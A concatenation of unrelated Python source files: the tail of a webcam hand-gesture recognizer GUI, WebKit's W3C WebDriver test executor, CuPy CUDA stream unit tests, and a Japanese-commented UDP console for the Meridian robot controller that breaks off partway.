        cv2.imshow("preview", frame)
        frame = frame[200:400, 300:500]
        frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
        frame = frame.reshape((1,) + frame.shape)
        frame = frame.reshape(frame.shape + (1,))
        test_datagen = ImageDataGenerator(rescale=1. / 255)
        m = test_datagen.flow(frame, batch_size=1)
        y_pred = model.predict_generator(m, 1)
        histarray2 = {'Empty': y_pred[0][0], 'One': y_pred[0][1],
                      'Three': y_pred[0][2], 'Zero': y_pred[0][3]}
        update(histarray2)
        print(classes[list(y_pred[0]).index(y_pred[0].max())])
        rval, frame = vc.read()
        key = cv2.waitKey(20)
        if key == 27:  # exit on ESC
            break
    cv2.destroyWindow("preview")
    vc = None


# Load the trained model once at startup (None when not trained yet).
model = load_model()


def close_window():
    """Return the gesture name currently typed in the entry box."""
    global entry
    entry = nete2.get()
    return entry


# ---- Tk GUI: add / delete / retrain / test gestures -------------------------
root = Tk()
print("")
# Do not shadow tkinter.Label (the original rebound the name `Label`).
name_label = Label(root, text="Enter the name of a new gesture")
name_label.grid(row=0, column=0)
nete2 = Entry(root)
nete2.grid(row=1, column=0)
currentDirectory = pathlib.Path(
    r'C:\Users\Obada\Desktop\Hand-Gesture-Recognizer-master\dataset\training_set')
v = []
for currentFile in currentDirectory.iterdir():
    print(currentFile)
    v.append(currentFile)
variable = StringVar(root)
variable.set("Select a gesture you want to delete")  # default value
global w
w = OptionMenu(root, variable, *v)
w.grid(row=3)


def printt():
    """Debug helper: print the currently selected gesture path."""
    global m
    m = variable.get()
    print(m)


def delete():
    """Remove the selected gesture folder from the training set."""
    shutil.rmtree(variable.get())


but3 = Button(root, text='delete', fg='red', command=delete)
but3.grid(row=3, column=1)
but = Button(root, text='add', fg='red', command=add)
but.grid(row=1, column=1)
but1 = Button(root, text='retrain', fg='red', command=train)
but1.grid(row=4)
but2 = Button(root, text='test', fg='red', command=realtime)
but2.grid(row=5)
root.mainloop()
webdriver_w3c_executor.py
# Copyright (C) 2017 Igalia S.L. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY # EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON # ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
import logging
import os
import json
import sys
from multiprocessing import Process, Queue

from webkitpy.common.system.filesystem import FileSystem
from webkitpy.common.webkit_finder import WebKitFinder

import webkitpy.thirdparty.autoinstalled.mozlog
import webkitpy.thirdparty.autoinstalled.mozprocess
from mozlog import structuredlog

# Location of the imported W3C webdriver/wptrunner tools inside the checkout.
w3c_tools_dir = WebKitFinder(FileSystem()).path_from_webkit_base('WebDriverTests', 'imported', 'w3c', 'tools')


def _ensure_directory_in_path(directory):
    # Prepend so the imported W3C copies win over any system-installed ones.
    if directory not in sys.path:
        sys.path.insert(0, directory)

_ensure_directory_in_path(os.path.join(w3c_tools_dir, 'webdriver'))
_ensure_directory_in_path(os.path.join(w3c_tools_dir, 'wptrunner'))

from wptrunner.executors.base import WdspecExecutor, WebDriverProtocol
from wptrunner.webdriver_server import WebDriverServer

pytest_runner = None


def do_delayed_imports():
    """Import pytest_runner lazily; it is only needed in the runner subprocess."""
    global pytest_runner
    import webkitpy.webdriver_tests.pytest_runner as pytest_runner


_log = logging.getLogger(__name__)


class MessageLogger(object):
    """Minimal mozlog-compatible logger that forwards every record to a
    message function (TestRunner.send_message)."""

    def __init__(self, message_func):
        self.name = 'WebKit WebDriver WPT logger'
        self.send_message = message_func

    def _log_data(self, action, **kwargs):
        self.send_message('log', action, kwargs)

    def process_output(self, process, data, command):
        self._log_data('process_output', process=process, data=data, command=command)


class TestRunner(object):
    """Receives messages from MessageLogger and routes them to webkitpy's
    logging at the matching level."""

    def __init__(self):
        self.logger = MessageLogger(self.send_message)
        structuredlog.set_default_logger(self.logger)

    def send_message(self, command, *args):
        if command == 'log':
            self._log(*args)

    def _log(self, level, details):
        """Dispatch one log record; `level` is a lower-cased mozlog level name."""
        if level == 'process_output':
            self._process_output(details['process'], details['command'], details['data'])
            return

        if 'message' not in details:
            return
        message = details['message']
        if level == 'info':
            _log.info(message)
        elif level == 'debug':
            _log.debug(message)
        elif level == 'error':
            _log.error(message)
        elif level == 'critical':
            # BUG FIX: was misspelled 'criticial', so critical records were
            # silently dropped.
            _log.critical(message)
        elif level == 'warning':
            _log.warning(message)

    def _process_output(self, pid, command, data):
        _log.debug('(%s:%d): %s' % (os.path.basename(command).split()[0], pid, data))


def _log_func(level_name):
    def log(self, message):
        self._log_data(level_name.lower(), message=message)
    log.__name__ = str(level_name).lower()
    return log

# Create all the level methods (debug, info, ...) on MessageLogger.
for level_name in structuredlog.log_levels:
    setattr(MessageLogger, level_name.lower(), _log_func(level_name))


class WebKitDriverServer(WebDriverServer):
    default_base_path = '/'
    test_env = None  # environment injected by WebDriverW3CExecutor.__init__

    def __init__(self, logger, binary=None, port=None, base_path='', args=None):
        WebDriverServer.__init__(self, logger, binary, port=port, base_path=base_path, args=args, env=self.test_env)

    def make_command(self):
        return [self.binary, '--port=%s' % str(self.port)] + self._args


class WebKitDriverProtocol(WebDriverProtocol):
    server_cls = WebKitDriverServer


class WebDriverW3CExecutor(WdspecExecutor):
    """Runs W3C wdspec tests in a child process, feeding test names through
    a queue and collecting pytest results from another."""
    protocol_cls = WebKitDriverProtocol

    def __init__(self, driver, server, env, timeout, expectations):
        WebKitDriverServer.test_env = env
        WebKitDriverServer.test_env.update(driver.browser_env())
        server_config = {'browser_host': server.host(),
                         'domains': {'': {'': server.host()}, 'alt': {'': '127.0.0.1'}},
                         'ports': {'http': [str(server.port())]},
                         'doc_root': server.document_root()}
        WdspecExecutor.__init__(self, driver.browser_name(), server_config, driver.binary_path(), None, capabilities=driver.capabilities())
        self._timeout = timeout
        self._expectations = expectations
        self._test_queue = Queue()
        self._result_queue = Queue()

    def setup(self):
        """Start the protocol and spawn the runner subprocess."""
        self.runner = TestRunner()
        self.protocol.setup(self.runner)
        args = (self._test_queue,
                self._result_queue,
                self.protocol.session_config['host'],
                str(self.protocol.session_config['port']),
                json.dumps(self.protocol.session_config['capabilities']),
                json.dumps(self.server_config),
                self._timeout,
                self._expectations)
        self._process = Process(target=WebDriverW3CExecutor._runner, args=args)
        self._process.start()

    def teardown(self):
        self.protocol.teardown()
        self._test_queue.put('TEARDOWN')  # sentinel: tells _runner to exit its loop
        self._process = None

    @staticmethod
    def _runner(test_queue, result_queue, host, port, capabilities, server_config, timeout, expectations):
        """Subprocess body: run each queued test under pytest until TEARDOWN."""
        if pytest_runner is None:
            do_delayed_imports()

        while True:
            test = test_queue.get()
            if test == 'TEARDOWN':
                break

            env = {'WD_HOST': host,
                   'WD_PORT': port,
                   'WD_CAPABILITIES': capabilities,
                   'WD_SERVER_CONFIG': server_config}
            env.update(WebKitDriverServer.test_env)
            args = ['--strict', '-p', 'no:mozlog']
            result_queue.put(pytest_runner.run(test, args, timeout, env, expectations))

    def run(self, test):
        """Queue one test and block until its result is available."""
        self._test_queue.put(test)
        return self._result_queue.get()
test_stream.py
import gc
import threading
import unittest

import pytest

import cupy
from cupy._creation import from_data
from cupy import cuda
from cupy import testing


# Parameterized over the two special built-in streams: the legacy default
# ("null") stream and the per-thread default ("ptds") stream.
@testing.parameterize(
    *testing.product({
        'stream_name': ['null', 'ptds'],
    }))
@testing.gpu
class TestStream(unittest.TestCase):

    def setUp(self):
        # HIP has no per-thread-default-stream equivalent.
        if cuda.runtime.is_hip and self.stream_name == 'ptds':
            self.skipTest('HIP does not support PTDS')
        # Remember the caller's current stream so tearDown can restore it.
        self._prev_stream = cuda.get_current_stream()
        if self.stream_name == 'null':
            self.stream = cuda.Stream.null
        elif self.stream_name == 'ptds':
            self.stream = cuda.Stream.ptds
        self.stream.use()

    def tearDown(self):
        self._prev_stream.use()

    @unittest.skipIf(cuda.runtime.is_hip, 'This test is only for CUDA')
    def test_eq_cuda(self):
        # Streams constructed the same way compare equal; null, ptds and a
        # fresh stream are all distinct from each other.
        null0 = self.stream
        if self.stream == cuda.Stream.null:
            null1 = cuda.Stream(True)
            null2 = cuda.Stream(True)
            null3 = cuda.Stream(ptds=True)
        else:
            null1 = cuda.Stream(ptds=True)
            null2 = cuda.Stream(ptds=True)
            null3 = cuda.Stream(True)
        null4 = cuda.Stream()
        assert null0 == null1
        assert null1 == null2
        assert null2 != null3
        assert null2 != null4

    @unittest.skipIf(not cuda.runtime.is_hip, 'This test is only for HIP')
    def test_eq_hip(self):
        # Same as test_eq_cuda but without the ptds variant.
        null0 = self.stream
        null1 = cuda.Stream(True)
        null2 = cuda.Stream(True)
        null3 = cuda.Stream()
        assert null0 == null1
        assert null1 == null2
        assert null2 != null3

    def test_hash(self):
        # Streams must be hashable and usable as dict keys.
        hash(self.stream)
        hash(cuda.Stream(True))
        hash(cuda.Stream(False))
        mapping = {cuda.Stream(): 1, cuda.Stream(): 2}  # noqa

    def check_del(self, null, ptds):
        # Deleting the current stream must leave the previous current-stream
        # pointer intact (the stream object keeps its ptr alive for the view).
        stream = cuda.Stream(null=null, ptds=ptds).use()
        assert stream is cuda.get_current_stream()
        stream_ptr = stream.ptr
        x = from_data.array([1, 2, 3])
        del stream
        assert stream_ptr == cuda.get_current_stream().ptr
        cuda.Stream.null.use()
        assert cuda.Stream.null is cuda.get_current_stream()
        # Want to test cudaStreamDestroy is issued, but
        # runtime.streamQuery(stream_ptr) causes SEGV. We cannot test...
        del x

    def test_del_default(self):
        self.check_del(null=False, ptds=False)

    def test_del(self):
        null = self.stream == cuda.Stream.null
        if cuda.runtime.is_hip:
            ptds = False
        else:
            ptds = self.stream == cuda.Stream.ptds
        self.check_del(null=null, ptds=ptds)

    def test_get_and_add_callback(self):
        # Callbacks must fire in enqueue order and on the enqueuing stream.
        N = 100
        cupy_arrays = [testing.shaped_random((2, 3)) for _ in range(N)]

        if not cuda.runtime.is_hip:
            stream = self.stream
        else:
            # adding callbacks to the null stream in HIP would segfault...
            stream = cuda.Stream()

        out = []
        stream_list = []

        def _callback(s, _, t):
            out.append(t[0])
            stream_list.append(s.ptr)

        for i in range(N):
            numpy_array = cupy_arrays[i].get(stream=stream)
            stream.add_callback(
                _callback,
                (i, numpy_array))

        stream.synchronize()
        assert out == list(range(N))
        assert all(s == stream.ptr for s in stream_list)

    @unittest.skipIf(cuda.runtime.is_hip,
                     'HIP does not support launch_host_func')
    def test_launch_host_func(self):
        # Host functions (cudaLaunchHostFunc) must also run in enqueue order.
        N = 100
        cupy_arrays = [testing.shaped_random((2, 3)) for _ in range(N)]

        stream = cuda.Stream.null

        out = []
        for i in range(N):
            numpy_array = cupy_arrays[i].get(stream=stream)
            stream.launch_host_func(
                lambda t: out.append(t[0]), (i, numpy_array))

        stream.synchronize()
        assert out == list(range(N))

    def test_with_statement(self):
        # `with` nests/restores the current stream like a stack...
        stream1 = cuda.Stream()
        stream2 = cuda.Stream()
        assert self.stream == cuda.get_current_stream()
        with stream1:
            assert stream1 == cuda.get_current_stream()
            with stream2:
                assert stream2 == cuda.get_current_stream()
            assert stream1 == cuda.get_current_stream()
        # ...but exiting the outermost `with` restores the null stream, not
        # the stream that .use() had installed before entering.
        # self.stream is "forgotten"!
        assert cuda.Stream.null == cuda.get_current_stream()

    def test_use(self):
        # .use() switches the current stream immediately.
        stream1 = cuda.Stream().use()
        assert stream1 == cuda.get_current_stream()
        self.stream.use()
        assert self.stream == cuda.get_current_stream()

    @testing.multi_gpu(2)
    def test_per_device(self):
        # The current stream is tracked per device.
        with cuda.Device(0):
            stream0 = cuda.Stream()
            with stream0:
                assert stream0 == cuda.get_current_stream()
                with cuda.Device(1):
                    assert stream0 != cuda.get_current_stream()
                    assert cuda.Stream.null == cuda.get_current_stream()
                assert stream0 == cuda.get_current_stream()

    @testing.multi_gpu(2)
    def test_per_device_failure(self):
        # Using a stream on a device other than the one it was created on
        # must raise.
        with cuda.Device(0):
            stream0 = cuda.Stream()
        with cuda.Device(1):
            with pytest.raises(RuntimeError):
                with stream0:
                    pass
            with pytest.raises(RuntimeError):
                stream0.use()

    def test_mix_use_context(self):
        # Interleaving .use() with `with` blocks; see cupy/cupy#5143.
        s1 = cuda.Stream()
        s2 = cuda.Stream()
        s3 = cuda.Stream()
        assert cuda.get_current_stream() == self.stream
        with s1:
            assert cuda.get_current_stream() == s1
            s2.use()
            assert cuda.get_current_stream() == s2
            with s3:
                assert cuda.get_current_stream() == s3
                del s2
            # exiting the `with` restores what was current at entry (s1),
            # even though s2 was used (and deleted) in between
            assert cuda.get_current_stream() == s1
        # self.stream is "forgotten"!
        assert cuda.get_current_stream() == cuda.Stream.null

    def test_stream_thread(self):
        # Two threads share one stream through the module-level global `s1`
        # (both inner functions declare `global s1`); the local s1 below is
        # deleted before the threads start. Checks the stream stays valid
        # while another thread still uses it and after both drop it.
        s1 = None

        def f1(barrier, errors):
            global s1
            tid = barrier.wait()
            try:
                s1 = cuda.Stream()
                barrier.wait()  # until t2 starts
                s1.use()
                barrier.wait()  # until t2 uses the stream
                s1 = None
                gc.collect()
                barrier.wait()  # until t2 decrefs the stream
                assert cuda.get_current_stream() is not None
                cupy.arange(10)
                errors[tid] = False
            except Exception as e:
                print(f'error in {tid}: {e}')

        def f2(barrier, errors):
            global s1
            tid = barrier.wait()
            try:
                barrier.wait()  # until t1 creates the stream
                s1.use()
                barrier.wait()  # until t1 uses the stream
                s1 = None
                gc.collect()
                barrier.wait()  # until t1 decrefs the stream
                assert cuda.get_current_stream() is not None
                cupy.arange(10)
                errors[tid] = False
            except Exception as e:
                print(f'error in {tid}: {e}')

        barrier = threading.Barrier(2)
        errors = [True, True]  # each thread flips its slot to False on success
        threads = [
            threading.Thread(target=f1, args=(barrier, errors), daemon=True),
            threading.Thread(target=f2, args=(barrier, errors), daemon=True),
        ]
        del s1  # drop the local; the threads only touch the global
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        for err in errors:
            assert err is False


@testing.gpu
class TestExternalStream(unittest.TestCase):
    """Same callback/host-func checks, but on a raw runtime-created stream
    wrapped with cuda.ExternalStream."""

    def setUp(self):
        self.stream_ptr = cuda.runtime.streamCreate()
        self.stream = cuda.ExternalStream(self.stream_ptr)

    def tearDown(self):
        cuda.runtime.streamDestroy(self.stream_ptr)

    def test_get_and_add_callback(self):
        N = 100
        cupy_arrays = [testing.shaped_random((2, 3)) for _ in range(N)]

        stream = self.stream
        out = []
        for i in range(N):
            numpy_array = cupy_arrays[i].get(stream=stream)
            stream.add_callback(
                lambda _, __, t: out.append(t[0]),
                (i, numpy_array))

        stream.synchronize()
        assert out == list(range(N))

    @unittest.skipIf(cuda.runtime.is_hip,
                     'HIP does not support launch_host_func')
    def test_launch_host_func(self):
        N = 100
        cupy_arrays = [testing.shaped_random((2, 3)) for _ in range(N)]

        stream = self.stream
        out = []
        for i in range(N):
            numpy_array = cupy_arrays[i].get(stream=stream)
            stream.launch_host_func(
                lambda t: out.append(t[0]), (i, numpy_array))

        stream.synchronize()
        assert out == list(range(N))
Meridian_console_v22_0418_osx.py
# #!/usr/bin/python3 # coding: UTF-8 # もしくは #!/usr/bin/env python など環境に合わせて #2022.02.05 UDP通信動作は安定。 #2022.02.05 COMMAND WINDOWのPOWERチェックボックスでサーボ電源ON #2022.02.05 上記サーボ電源ON中にスライドバー操作でサーボ動作(ただしスライドバーが小さいため大まかな動作確認のみに利用可) #2022.04.05 コードを少し整理整頓 #2022.04.14 各経路でのエラーの検知と表示の機能を搭載 #2022.04.14 ROSのパブリッシュボタンを追加。ROSのサブスクライブは未実装。 # # 取扱説明書 # ・起動方法 # 当ファイルがあるディレクトリにて、ターミナルより # python3 Meridian_console_v22_0415.py # と入力して実行します。必要に応じてライブラリをpip3で追加してください。 # UDP_RESV_IP,UDP_SEND_IPについては予め調べスクリプト上で書き換えておく必要があります。 # UDP_RESV_IPはターミナルにてip a もしくはipconfig,ifconfig等で調べられます。 # UDP_SEND_IPはESP32の起動時にPCシリアルモニタ上に表示されます。 # ・画面について # Command画面 # POWER: 全サーボのパワーをオンオフします # Action: サインカーブの首振りモーションを送信します # ->ROS1: ROS1のjointデータをパブリッシュします(Rvisと連動できます) # <-ROS1: ROS1のサブスクライブですが未実装です。 # Control Pad Monitor: リモコンの入力状態を標準化して表示します。 # Message画面 # IPと各経路のエラーカウント、エラー率、フレーム数、動作周波数を表示します # ResetCounter: カウンタの値をリセットするボタンです。 # TsySKIP, PcSKIP: 連番データの取りこぼし数を表示します(今はちょっと多めです。周波数を50Hzまで下げるとゼロになります。) # Sensor Monitor: MIUのデータを表示します。rol,pit,yawはセンサフュージョン値です。SetYawボタンでヨー軸の中央値をリセットできます。 # Axis Monitor: 各サーボの値です。パワーオン時にはスライダでサーボを動かすことができます。 # OSX版はROSが未搭載です from ast import Pass import numpy as np import socket from contextlib import closing import struct import math import dearpygui.dearpygui as dpg import threading import signal import time #import random import atexit #import sys #from re import I import rospy from sensor_msgs.msg import JointState import struct #定数 TITLE_VERSION="Meridian Console v22.0418_osx" #DPGのウィンドウタイトル兼バージョン表示 UDP_RESV_IP="192.168.1.xx" #このPCのIPアドレス UDP_RESV_PORT=22222 #受信ポート UDP_SEND_IP="192.168.1.xx" #送信先のESP32のIPアドレス UDP_SEND_PORT=22224 #送信ポート MSG_SIZE = 90 #Meridim配列の長さ(デフォルトは90) MSG_BUFF = MSG_SIZE * 2 #Meridim配列のバイト長さ STEP = 0.02 #1フレームあたりに増加させる制御処理用の数値 #マスターコマンド用の定数(Meridim配列0番に格納する値) CMD_SET_YAW_CENTER = 1002 #IMUのヨー軸センターリセットコマンド #制御コマンド用フラグ等 flag_update_yaw_center = 0 #IMUのヨー軸センターリセットフラグ(python内部用) flag_servo_power = 0 #全サーボのパワーオンオフフラグ flag_send_data = 0 
#状態データ送信モードのオンオフフラグ(サーボパワーオフでもデータ送信可能) flag_send_motion = 0 #計算モーション送信のオンオフフラグ flag_ros1_pub = 0 #ROS1のjoint_statesのパブリッシュ flag_ros1_sub = 0 #ROS1のjoint_statesのサブスクライブ #UDP用のsocket設定 sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) sock.bind((UDP_RESV_IP,UDP_RESV_PORT)) #エラー集計表示用変数 loop_count = 0 #フレーム数のカウンタ error_count_esp_to_pc = 0 #PCからESP32へのUDP送信でのエラー数 error_count_pc_to_esp = 0 #ESP32からPCへのUDP送信でのエラー数 error_count_esp_to_tsy = 0 #ESPからTeensyへのSPI通信でのエラー数 error_count_tsy_to_esp = 0 #TeensyからESP32へのSPI通信でのエラー数 error_count_tsy_skip = 0 #Teensyが受信したデータがクロックカウントスキップしていたか error_count_pc_skip = 0 #PCが受信したデータがクロックカウントスキップしていたか frame_clock = 0 #送信するframe_clock(0-199) frame_clock_resv = 0 #今回受信したframe_clock frame_clock_resv_past = 0#前回受信したframe_clock start = time.time() # フレームレート計測用のタイマー初期値 #Meridim配列関連 r_meridim_disp=list(range(MSG_SIZE)) #Meridim配列の受信値short表示用 r_meridim_disp_char=list(range(MSG_SIZE*2)) #Meridim配列の受信値char表示用 r_meridim=[0]*MSG_SIZE #Meridim配列の送信値用 s_meridim=[0]*MSG_SIZE #Meridim配列の送信値用 s_meridim_motion=[0]*MSG_SIZE #Meridim配列のPC側で作成したサーボ位置命令送信用 #メッセージ表示用 message0 = "This PC's IP adress is "+UDP_RESV_IP message1 = "" message2 = "" message3 = "" #モーション計算用変数 x = 0 #増分計算用 (STEPずつ) y = 0 #増分計算用 (1ずつ) #def udpresv(): # pass # デ ー タ の 送 受 信 ######################################################################### def meridian_loop(): global message0 global message1 global message2 global message3 global x global y while (True): print("checksss") message1 = "Waiting for UDP data from "+UDP_SEND_IP+"..." 
with closing(sock): while True: global loop_count global r_meridim_disp global r_meridim_disp_char global s_meridim_motion global error_count_pc_to_esp global error_count_esp_to_tsy global error_count_tsy_to_esp global error_count_esp_to_pc global error_count_tsy_skip global error_count_pc_skip global frame_clock global frame_clock_resv global frame_clock_resv_past global flag_servo_power global flag_ros1_pub global flag_ros1_sub loop_count += 1 #このpythonを起動してからのフレーム数をカウントアップ r_bin_data,addr = sock.recvfrom(1472)#UDPに受信したデータを転記 r_meridim=struct.unpack('90h',r_bin_data) r_meridim_disp_char=struct.unpack('180b',r_bin_data) message1 = "UDP data receiving from "+UDP_SEND_IP checksum = np.array([0], dtype=np.int16) for i in range(MSG_SIZE-1): checksum[0] += r_meridim[i] r_meridim_disp[i]=r_meridim[i] checksum[0] = ~checksum[0] #print("[Calc] ",checksum[0]) #print("[Ans ] ",r_meridim[MSG_SIZE-1]) temp = np.array([0], dtype=np.int16) # エラーフラグ各種のカウントアップ if checksum[0] == r_meridim[MSG_SIZE-1]: if (r_meridim_disp[88] >> 14 & 1) == 1:#エラーフラグ14ビット目(ESP32のPCからのUDP受信のエラーフラグ)を調べる error_count_pc_to_esp += 1 if (r_meridim_disp[88] >> 13 & 1) == 1:#エラーフラグ13ビット目(TeensyのESP32からのSPI受信のエラーフラグ)を調べる error_count_esp_to_tsy += 1 if (r_meridim_disp[88] >> 12 & 1) == 1:#エラーフラグ12ビット目(ESPのTeensyからのSPI受信のエラーフラグ)を調べる error_count_tsy_to_esp += 1 if (r_meridim_disp[88] >> 9 & 1) == 1:#エラーフラグ12ビット目(ESPのTeensyからのSPI受信のエラーフラグ)を調べる error_count_tsy_skip += 1 temp[0] = r_meridim[88] & 0b0111111111111111 #エラーフラグ15ビット目(PCのUDP受信エラーフラグ)を下げる else: temp[0] = r_meridim[88] | 0b1000000000000000 #エラーフラグ15ビット目(PCのUDP受信エラーフラグ)を上げる error_count_esp_to_pc += 1 #クロックの受信 frame_clock_resv_past = frame_clock_resv #前回受信したクロックを今回のpastとしてキープ frame_clock_resv = r_meridim_disp[88] & 0b0000000011111111 #クロックを受信 if(frame_clock_resv == frame_clock_resv_past + 1): #受信したクロックが送信したものから+2であればスキップなし temp[0] &= 0b1111111011111111 #PCのスキップフラグを下げる elif((frame_clock_resv == 0 ) and (frame_clock_resv_past == 199)): temp[0] &= 
0b1111111011111111 #PCのスキップフラグを下げる else: print("Found data skipping on PC.") temp[0] |= 0b0000000100000000 #PCのスキップフラグを上げる error_count_pc_skip += 1 #スキップカウントをプラス #送信用クロックの準備 frame_clock += 1 #送信用のframe_clockをカウントアップ if frame_clock >199: frame_clock=0 temp[0] &= 0b1111111100000000 #下位8ビットをクリア temp[0] += frame_clock #下位8ビットに受信カウントに+1したものを格納 #PC側サーボ位置発信用に最終サーボ情報をキープ if flag_servo_power == 2: #サーボオンボタン押下初回のみ最終受け取りサーボ情報をキープ for i in range(21,81,2): s_meridim_motion[i] = r_meridim[i] flag_servo_power = 1 #送信データのベースを受信データのコピーで作成する s_meridim=[] s_meridim=list(r_meridim) #キープしたエラーフラグ/送信クロックを格納 s_meridim[88] = temp[0] #PC側でサーボ位置を計算制御する場合は以下でデータを作成 if flag_send_motion == 1: # # xをフレームごとにカウントアップ x += STEP y += 1 if y>10000: y = 0 if x>100: x = 0 #print(np.sin(x)," " ,x) s_meridim_motion[51] = int(np.sin(x)*3000) #プラマイ10度の間でサインカーブを出力 #サーボオンオフフラグチェック:サーボオンフラグを格納 if flag_servo_power > 0: for i in range(20,80,2): s_meridim[i] = 1 s_meridim[i+1] = s_meridim_motion[i+1] else: for i in range(20,80,2): s_meridim[i] = 0 #マスターコマンドフラグチェック:ヨー軸センターリセットコマンドを格納 global flag_update_yaw_center if (flag_update_yaw_center > 0): flag_update_yaw_center -= 1 s_meridim[0] = CMD_SET_YAW_CENTER if (flag_update_yaw_center==0): print("Send COMMAND 'Set Yaw Center.':["+str(CMD_SET_YAW_CENTER)+"]") #格納した送信データについてチェックサムを追加 checksum[0] = 0 checksum_int = 0 for i in range(MSG_SIZE-1): checksum_int += s_meridim[i] checksum[0] = ~checksum_int s_meridim[MSG_SIZE-1]=checksum[0] time.sleep(2/1000) #少し休む場合 #データをパックしてUDP送信 s_bin_data=struct.pack('90h',*s_meridim) sock.sendto(s_bin_data,(UDP_SEND_IP,UDP_SEND_PORT)) #print("Frame "+str(int(frame_clock_resv - frame_clock_resv_past))) now = time.time()-start message2="ERROR COUNT ESP-PC:"+str("{:}".format(error_count_esp_to_pc))+\ " PC-ESP:"+str("{:}".format(error_count_pc_to_esp))+" ESP-TSY:"+str("{:}".format(error_count_esp_to_tsy))+" TsySKIP:"+\ str("{:}".format(error_count_tsy_skip))+" PcSKIP:"+str("{:}".format(error_count_pc_skip))+\ " Frames:"+str(loop_count)+" 
"+str(int(loop_count/now))+"Hz" message3="ERROR RATE ESP-PC:"+str("{:.2%}".format(error_count_esp_to_pc/loop_count))+\ " PC-ESP:"+str("{:.2%}".format(error_count_pc_to_esp/loop_count))+" ESP-TSY:"+str("{:.2%}".format(error_count_esp_to_tsy/loop_count)) # 関 数 各 種 ######################################################################### def cleanup():#ctrl+cで終了したときにも確実にソケットを閉じる試み(いまのところ機能していない) print("Meridan_console quited.") atexit.register(cleanup)#この行は機能しているかどうかわからない def set_servo_power():#チェックボックスに従いサーボパワーオンフラグをオンオフ global flag_servo_power if flag_servo_power == 0 : flag_servo_power = 2 print("Servo Power ON") else: flag_servo_power = 0 print("Servo Power OFF") def set_data():#チェックボックスに従いデータ送信フラグをオンオフ global flag_send_data if flag_send_data == 0 : flag_send_data = 1 print("Start sending Data.") else: flag_send_data = 0 print("Quit sending Data.") def set_action():#チェックボックスに従いアクション送信フラグをオンオフ global flag_send_motion if flag_send_motion == 0 : flag_send_motion = 1 print("Start Motion Data Streaming.") else: flag_send_motion = 0 print("Quit Motion Data Streaming.") def ros1_pub():#チェックボックスに従いROS1パブリッシュフラグをオンオフ global flag_ros1_pub if flag_ros1_pub == 0 : flag_ros1_pub = 1 print("Start publishing ROS1 joint_states.") else: flag_ros1_pub = 0 print("Quit publishing ROS1 joint_states.") def ros1_sub():#チェックボックスに従いROS1サブスクライブフラグをオンオフ global flag_ros1_sub if flag_ros1_sub == 0 : flag_ros1_sub = 1 print("Start subscribing ROS1 joint_states.") else: flag_ros1_sub = 0 print("Quit publishing ROS1 joint_states.") def set_servo_angle(sender, app_data):# global s_meridim_motion if sender[3]=="L": s_meridim_motion[int(sender[4:6])*2+21] = int(app_data*100) print(f"L meri: {int(sender[4:6])*2+21}") if sender[3]=="R": s_meridim_motion[int(sender[4:6])*2+51] = int(app_data*100) print(f"R meri: {int(sender[4:6])*2+51}") print(f"sender is: {sender[3]}") print(f"sender is: {sender[4:6]}") print(f"app_data is: {int(app_data*100)}") print(f"motion is: 
{s_meridim_motion[int(sender[4:6])+21]}") # dearpygui に よ る コ ン ソ ー ル 画 面 描 写 ######################################################################### def main(): #global checksum global r_meridim # dpg用関数 ================================================== def set_yaw_center():#IMUのヨー軸センターリセットフラグを10上げる(コマンドを10回送信する) global flag_update_yaw_center flag_update_yaw_center = 20 def reset_counter():#カウンターのリセット global loop_count global error_count_pc_to_esp global error_count_esp_to_tsy global error_count_tsy_to_esp global error_count_esp_to_pc global error_count_tsy_skip global error_count_pc_skip global start loop_count = 1 error_count_pc_to_esp = 0 error_count_esp_to_tsy = 0 error_count_tsy_to_esp = 0 error_count_esp_to_pc = 0 error_count_tsy_skip = 0 error_count_pc_skip = 0 start = time.time() while(True): # R O S 1 joint_statesのパブリッシュ ===================================================================================== # 未導入 # ==================================================================================================== # dpg描画 ================================================== dpg.create_context() dpg.create_viewport(title=TITLE_VERSION, width=600, height=480) # (画面左上)サーボ位置モニタリング用のウィンドウ ================================================== with dpg.window(label="Axis Monitor", width=250, height=350,pos=[5,5]): with dpg.group(label='LeftSide'): for i in range(0, 15, 1): dpg.add_slider_float(default_value=0, tag="ID L"+str(i),label="L"+str(i),max_value=100,min_value=-100,callback=set_servo_angle,pos=[10,35+i*20], width=80) with dpg.group(label='RightSide'): for i in range(0, 15, 1): dpg.add_slider_float(default_value=0, tag="ID R"+str(i),label="R"+str(i),max_value=100,min_value=-100,callback=set_servo_angle,pos=[135,35+i*20], width=80) # (画面下段)メッセージ表示用ウィンドウ(アドレス・通信エラー等) ================================================== with dpg.window(label="Messege", width=590, height=115,pos=[5,360]): dpg.add_button(label="ResetCounter", callback=reset_counter, width =90, 
